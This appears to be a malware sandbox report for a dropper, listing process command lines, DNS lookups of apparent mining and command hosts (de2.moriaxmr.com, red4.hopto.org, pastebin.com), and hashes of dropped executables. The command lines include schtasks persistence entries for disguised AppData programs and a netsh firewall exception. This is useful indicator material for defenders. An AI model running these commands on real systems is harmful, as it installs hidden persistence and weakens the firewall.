schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 416 -p 4076 -ip 4076

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4076 -s 800

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 484 -p 4644 -ip 4644

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4644 -s 800

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 de2.moriaxmr.com udp
NL 104.110.191.140:80 tcp
NL 104.110.191.140:80 tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
NL 13.69.109.130:443 tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
GB 92.123.143.240:80 tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp

Files

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

memory/2008-130-0x0000000000000000-mapping.dmp

memory/3004-133-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/4708-136-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

C:\Users\Admin\AppData\Local\Temp\li4.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

C:\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

C:\Users\Admin\AppData\Local\Temp\n.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

memory/4920-140-0x0000000000000000-mapping.dmp

memory/2172-139-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

memory/1040-145-0x0000000000000000-mapping.dmp

memory/2172-148-0x00000000005F0000-0x0000000000C80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

MD5 a38702ff13a83f2177bb45d99f4f6e4e
SHA1 198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA512 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3

memory/1040-149-0x00000000007A0000-0x0000000000856000-memory.dmp

memory/1040-150-0x00000000053C0000-0x000000000545C000-memory.dmp

memory/2172-151-0x00007FFF9AD40000-0x00007FFF9B801000-memory.dmp

memory/2128-153-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2128-152-0x0000000000000000-mapping.dmp

memory/1040-154-0x0000000005A10000-0x0000000005FB4000-memory.dmp

memory/1040-156-0x0000000005500000-0x0000000005592000-memory.dmp

memory/408-159-0x0000000000000000-mapping.dmp

memory/408-160-0x0000000000400000-0x000000000044C000-memory.dmp

memory/3784-162-0x0000000000000000-mapping.dmp

memory/1040-163-0x00000000051A0000-0x00000000051AA000-memory.dmp

memory/1040-168-0x00000000055A0000-0x00000000055F6000-memory.dmp

memory/3756-166-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

MD5 222f649af364623037bda8ee9df02945
SHA1 f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA256 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512 c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64

memory/408-178-0x0000000000400000-0x000000000044C000-memory.dmp

memory/408-176-0x0000000000400000-0x000000000044C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

MD5 222f649af364623037bda8ee9df02945
SHA1 f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA256 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512 c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64

memory/1668-173-0x0000000000000000-mapping.dmp

memory/2064-181-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2064-180-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/5104-186-0x0000000000000000-mapping.dmp

memory/2064-188-0x000000006EB30000-0x000000006F0E1000-memory.dmp

memory/5104-192-0x0000000010410000-0x0000000010471000-memory.dmp

memory/408-189-0x0000000010410000-0x0000000010471000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XX--XX--XX.txt

MD5 06c726690de1e0bf2ee467d6da373c60
SHA1 f98af670a712cfc223c444d6beb0803642054260
SHA256 d884fb142b4dd02afc9e7a903cd5ef618d39525b31ff35edbaa79a4e768738fc
SHA512 90716d4b014333d9eefb86576d29c5ee45aaa7e20cc3266e82860c084d8fda17611d08b05ccc23f0e16affe73ab6dd209a446cfa805fbb3c5ecf95fe7b5f418e

C:\Users\Admin\AppData\Local\Temp\c.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/4272-194-0x0000000000000000-mapping.dmp

memory/5104-196-0x0000000010410000-0x0000000010471000-memory.dmp

memory/4476-197-0x0000000000000000-mapping.dmp

memory/3720-199-0x0000000000000000-mapping.dmp

memory/824-198-0x0000000000000000-mapping.dmp

memory/2604-201-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2604-200-0x0000000000000000-mapping.dmp

memory/2128-206-0x0000000005870000-0x00000000058D6000-memory.dmp

memory/2604-207-0x000000006EB30000-0x000000006F0E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

memory/4076-212-0x00007FFF9AD40000-0x00007FFF9B801000-memory.dmp

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/2124-216-0x0000000000580000-0x000000000058C000-memory.dmp

memory/568-221-0x0000000001400000-0x000000000144C000-memory.dmp

memory/568-220-0x0000000000000000-mapping.dmp

memory/568-233-0x0000000001400000-0x000000000144C000-memory.dmp

memory/568-232-0x0000000001400000-0x000000000144C000-memory.dmp

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/2124-215-0x0000000000000000-mapping.dmp

memory/3784-235-0x0000000000000000-mapping.dmp

memory/3480-234-0x0000000000000000-mapping.dmp

memory/4560-237-0x0000000000000000-mapping.dmp

memory/4056-236-0x0000000000000000-mapping.dmp

memory/608-238-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

MD5 6efec1ae1365a1aa84d3c030b9a8ff39
SHA1 7391ea75580e1353d7f4e089ed04723533c64601
SHA256 86e0339e72c99d4913f0f19476d8798b86404630fa73f259d3cd6ff75a4a50cf
SHA512 5ceb1f0cdbbd8a22043866b3e445684b6224d628f37560271ba59bd5b2e68c2a71207eca9998993bef4ea24e2d03e79e883eb7f05afb8dbb919e0869716dbfcd

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

MD5 4d9b81630965b6fedc6a74f17640a091
SHA1 dc82f73f7fe5dd559b1dbbf8eb359b0e0193f1f6
SHA256 46aacf7129aff614e9ba2e2ddc345d02bc5c88ca58904dc74d5aac149fda7f61
SHA512 617dd1b67a135a1a295f8cea2d28ac6c7c6016a5fe1a8a2517423bae475a175622c3d4f3c5f564de78cc2110b8c969d2ab18b11ae010a25d3fd41185c7c8e0ff

memory/408-241-0x0000000000000000-mapping.dmp

memory/408-246-0x000000006EB30000-0x000000006F0E1000-memory.dmp

memory/384-247-0x0000000000000000-mapping.dmp

memory/556-248-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log

MD5 9f893d94b017a0684012d50319c9ffbe
SHA1 140cc2cb6b2520ba4f9a1f666a5f679853472793
SHA256 8a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec
SHA512 4b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

MD5 8e42b462d64f31e8f8b90f121a873b39
SHA1 7debe9f369937f1d17a8bb9e813b912b0ada1ead
SHA256 05be1d1b144d3b044d98eb75acabc7b688d4b5d3535ed340afa0e97f9bca4112
SHA512 61fc2e12e86677bb202e10999ade1299df1c93b3048577aee5a087ec37e6fb675443f5b4afa51d900ce7db3d9c94fcb02822215d7b613d4004e155dddf429329

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

memory/4764-252-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

MD5 657f403a19497b80aefa11dfb75f4600
SHA1 c2c296140be72560a9602b8e918133f7991f65b3
SHA256 415830b94630e82b4460b4ff755a3049cb5558f30a5660d6923f61f3af7cd53c
SHA512 346e28c3fbd3e92b8b9a4ececeb45278bff97091e45c3519a42b7348cb826840a131d35db77b11e7537fab6bbc8da3eb8a99eae31168812ca45f20f1eebcfe04

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

MD5 c9d867ee51bbdedf69adf18c62657d09
SHA1 357975b6b94eba762375c2b5ac96083973ccc22f
SHA256 c3f5013436c2ff0f41dd68391ad243e3cb376fde386f2b73ca1cc2d3d11a9026
SHA512 cb4f2411462e9b39a1902abe70d866f6b41916448ff91b3ad553a2534916f2fd22efbf5992795986314a27b51383117f29783f9e623d83d73832a82f2e254e5a

C:\Users\Admin\AppData\Roaming\efsui\data.exe

MD5 19798d808798340e03649c9543412ae7
SHA1 e6196ccfd4db48ca82b4d74ab2013513f59ac610
SHA256 b8c8dbe499eeea2a2919cdedc3edfd30371363875d91832598abfade68d63c36
SHA512 e1f89b56eea160f883f84239521078db88f5e73d0e76717985fa31ed519474a5cd264e5c2322e1da02b5130457490bfc3a4757569c7f7e9f0dc6d7f0381e2b6d

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 c637c8d000e3e666d38f6270b8c7409d
SHA1 37f52d05ecf8f03cfa31e7bf6b822ce57e0644aa
SHA256 fb6956f3a7ad50837ccfa07783f35a93e1d172769db981fd7e8e0899f6940320
SHA512 9091a745404197600d272f3ac3d934905857fe7e7e1d25f25563e5b6fea23c1b67341a7c0f9c69fa67c2e696e7ee15adac571029207cf65b52cc8da88380cb04

C:\Users\Admin\AppData\Roaming\efsui\data.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

C:\Users\Admin\AppData\Local\Temp\li4.exe

MD5 c3e5173973852eaa2a61ac4cb6b44ee7
SHA1 ebd3032065022d2e895a0bf3cf698d5b4dc27ca1
SHA256 e3346152388318a7a6e61a8593b293cec79798ad74f2f340fd14861aae89cf39
SHA512 44f4cfe2be5dc6f2dfcbfd507b48b5dc30bcea15e8cc1e8aa95f50d165cf03aa0de86471cff0edc05d7c9fdcb577f596b2fce78ce0b96f521d24e789116961c1

memory/1280-267-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 1c3edd75bbb85f58f247d06eeeb78937
SHA1 1627b8e3e55d75d8128ef908496f68e0a33ae574
SHA256 5bfa9ea2ab1604b8246b753822f137f40549f9517e453f0c355612df1fdc070a
SHA512 4477cf73f7840e711abfc3111dd50e24216c1f52262742be1b2078357a4f89b53c9be416d48f79ca4907f4c867ce4c4fff22b73cd9c34649f377992b28329a16

memory/1556-273-0x0000000000970000-0x00000000009BC000-memory.dmp

memory/1556-272-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\n.exe

MD5 1df9907acee1e256bff862f4bbdf2605
SHA1 d8d497115f9830def8c20c1537b00dfb045c38b5
SHA256 7f57668a1b42736a9bc3644f5057cf68ac53c3cbd974a5c868c503922d4656db
SHA512 008d09830fa5bf0dcc0cb784b9b8186d0f19d9b3448fb9f09ef3162f46271cafd16e95d30af86fa1bbf12f5f94582fe847abd3cb9730fe9b26bca4d66f015380

memory/4644-264-0x00007FFF9AD40000-0x00007FFF9B801000-memory.dmp

memory/5036-259-0x0000000000000000-mapping.dmp

memory/4904-258-0x0000000000000000-mapping.dmp

memory/1280-286-0x000000006EB30000-0x000000006F0E1000-memory.dmp

memory/3968-287-0x0000000000000000-mapping.dmp

memory/4052-289-0x0000000000000000-mapping.dmp

memory/4772-288-0x0000000000000000-mapping.dmp

memory/2800-290-0x0000000000000000-mapping.dmp

memory/2800-296-0x000000006EB30000-0x000000006F0E1000-memory.dmp